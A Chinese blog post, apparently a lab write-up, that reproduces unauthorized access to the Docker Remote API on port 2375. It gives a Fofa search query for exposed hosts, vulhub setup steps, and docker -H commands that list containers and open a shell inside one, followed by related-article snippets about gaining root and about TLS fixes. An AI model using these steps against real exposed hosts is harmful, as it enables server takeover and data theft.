Docker Remote API 未授权访问漏洞

于 2024-08-04 18:34:53 发布
阅读量150 收藏 1
点赞数 3
分类专栏: 未授权访问合集 文章标签: docker 容器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53736204/article/details/140909413
版权

Docker Remote API 未授权访问漏洞

Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。
Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,由docker官方提供。

漏洞信息

Docker Remote API如配置不当可导致未授权访问,被攻击者恶意利用。攻击者无需认证即可访问到Docker数据,可能导致敏感信息泄露,黑客也可以删除 Docker上的数据,直接访问宿主机上的敏感信息,或对敏感文件进行修改,最终完全控制服务器。

步骤一:使用以下Fofa语句对Docker产品进行搜索或者使用vulhub提供的镜像来复现

#fofa语法
port="2375"
#vulhub靶场
cd vulhub/docker/unauthorized-rce
vi docker-compose.yml 
docker-compose up -d

在这里插入图片描述访问网站
在这里插入图片描述

步骤二:直接使用浏览器访问以下路径

http://ip:2375/version #查看版本信息
http://ip:2375/info #查看容器信息

在这里插入图片描述

docker -H tcp://192.168.30.138:2375 ps
docker -H tcp://192.168.30.138:2375 version
docker -H tcp://192.168.30.138:2375 exec -it 1f4 /bin/bash

在这里插入图片描述

黑白时光les
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
docker remote api授权访问漏洞(端口:2375)
墨痕诉清风的博客
11-11 4391
授权访问漏洞是因为可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个apiurl输入ip:2375/version就会列出基本信息,和docker version命令效果一样。同样,url为ip:2375/v1.23/containers/json会列出容器信息,和docker ps -a效果一样。...
Docker Remote API 授权漏洞全球探测1
08-03
漏洞发现的起因是,有一位同学在使用 docker swarm 的时候,发现了管理的 docker 节点上会开放一个 TCP 端口 2375,绑定在 0.0.0.
Docker Remote API授权访问漏洞以及安全防护
qq_46487664的博客
07-26 555
设备IP地址操作类型docker版本镜像训练机centos718.03.1-ce靶机Ubuntu24.0.4至少一个容器镜像。
漏洞扫描-Docker Remote API 授权访问漏洞利用
weixin_44041994的博客
03-15 368
Docker提供了一个用于与Docker守护程序交互的API(称为 Docker 引擎 API)。Docker引擎API是一个RESTful API,可由HTTP客户端(如 wget 或 curl)或HTTP 库访问,HTTP库是大多数现代编程语言的一部分。在网址栏输入 目标主机IP:2375/containers/json可获取该主机的Docker容器信息。使用docker命令创建一个alpine容器,并将目标主机的磁盘挂载到容器中。Docker是一种执行操作系统级虚拟化的计算机程序,也称为"容器化"。
Docker Remote Api授权访问漏洞
Seth为理想奋斗
06-17 3071
一. 漏洞原因 dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375 docker守护进程监听在0.0.0.0,外网可访问 3, 没有使用iptables等限制可连接的来源ip二. 漏洞利用1.远程对被攻击的主机的docker容器进行操作docker -H tcp://remoteip:2375 images 远程启动被攻击主机的docker
Docker Remote API授权访问
lyink001的博客
12-16 1312
docker remote api获取服务器权限
Docker Remote API授权访问漏洞分析和利用
热门推荐
3569
12-01 1万+
0x00 概述 最近提交了一些关于 docker remote api 授权访问导致代码泄露、获取服务器root权限的漏洞,造成的影响都比较严重,比如 新姿势之获取果壳全站代码和多台机器root权限 新姿势之控制蜻蜓fm所有服务器 新姿势之获取百度机器root权限 因为之前关注这一块的人并不多,这个方法可以算是一个“新的姿势”,本文对漏洞产生的原因和利用过程进行
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 2251
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
关于docker remote api 授权访问漏洞
weixin_44835190的博客
05-07 1273
漏洞介绍: 描述: Docker Remote API是一个取代远程命令行界面(rcli)的REST API。通过 docker client 或者 http 直接请求就可以访问这个 API,通过这个接口,我们可以新建 container,删除已有 container,甚至是获取宿主机的 shell。 docker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器...
[Shell]Docker remote api授权访问漏洞(Port=2375)
baguangman5501的博客
09-16 689
0x01 简介 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerDocker remote Api授权访问的攻击原理与之前的Redis授权访问漏洞大同小异,都是通过向运行该应用的服务器写文件,从而拿到服务器的权限。 docker swarm是docker下的分...
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证_docker远程接口授权访问漏洞怎么解决
2401_84968016的博客
05-12 622
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DockerDocker Remote API 访问控制
01-09
Docker的远程调用 API 接口存在授权访问漏洞,至少应限制外网访问。建议使用 Socket 方式访问,监听内网 ip,docker daemon 启动方式如下: [root@localhost ~]# vim /usr/lib/systemd/system/docker.service ##...
1. 离线安装docker; 2. 实现docker-cert配置,修复docker remote API漏洞;.zip
04-30
docker安装 docker安装方法有多种,下面列举在Windows和Linux系统中的安装步骤:12 ...可以通过访问Docker官网的CentOS下载地址获取帮助文档,按步骤进行安装。 安装Docker CE(Community Edition)
基于Docker的MongoDB实现授权访问的方法
09-09
主要介绍了基于Docker的MongoDB实现授权访问的方法,需要的朋友可以参考下
docker的精髓理解
lixia0417mul2的博客
08-03 203
docker的精髓
基于docker的 nacos安装部署
Hello World
08-02 379
最后可以通过 ip:8848/nacos 访问,登录密码默认nacos/nacos。先查看一下linux有没有开放nacos的8848端口,记得使用。拉取nacos官方镜像,这里使用默认命令。解决方案:重启docker。开放后记得重启防火墙。
Docker 镜像仓库搭建
kkming的专栏
08-03 569
其中,Docker Hub是官方的公共镜像仓库,Harbor是一个企业级的私有镜像仓库解决方案,Registry则是Docker官方提供的轻量级私有仓库服务。如果搭建的是HTTP协议的私有仓库,需要修改Docker的配置文件,添加。在浏览器中访问Harbor的Web界面(默认是宿主机的80端口或配置的HTTPS端口),进行登录和管理操作。的容器,将容器的5000端口映射到宿主机的5000端口,并将宿主机的。将本地的Docker镜像打上标签,指定仓库地址和端口。根据使用场景,确定仓库的大小、访问权限等需求。
DOCKER】显示带UI的软件
最新发布
zhy29563
08-03 168
DOCKER显示UI软件
Docker Registry 授权访问漏洞
04-25
Docker Registry 授权访问漏洞是指攻击者可以在授权的情况下访问或者下载镜像。这种漏洞的危害性较大,因为攻击者可以使用被盗取的镜像发起攻击,造成不可预测的后果。要解决这个问题,可以通过限制访问 Docker Registry 的权限、加强密码强度,并且定期更新 Docker Registry 的软件等方式来保障安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值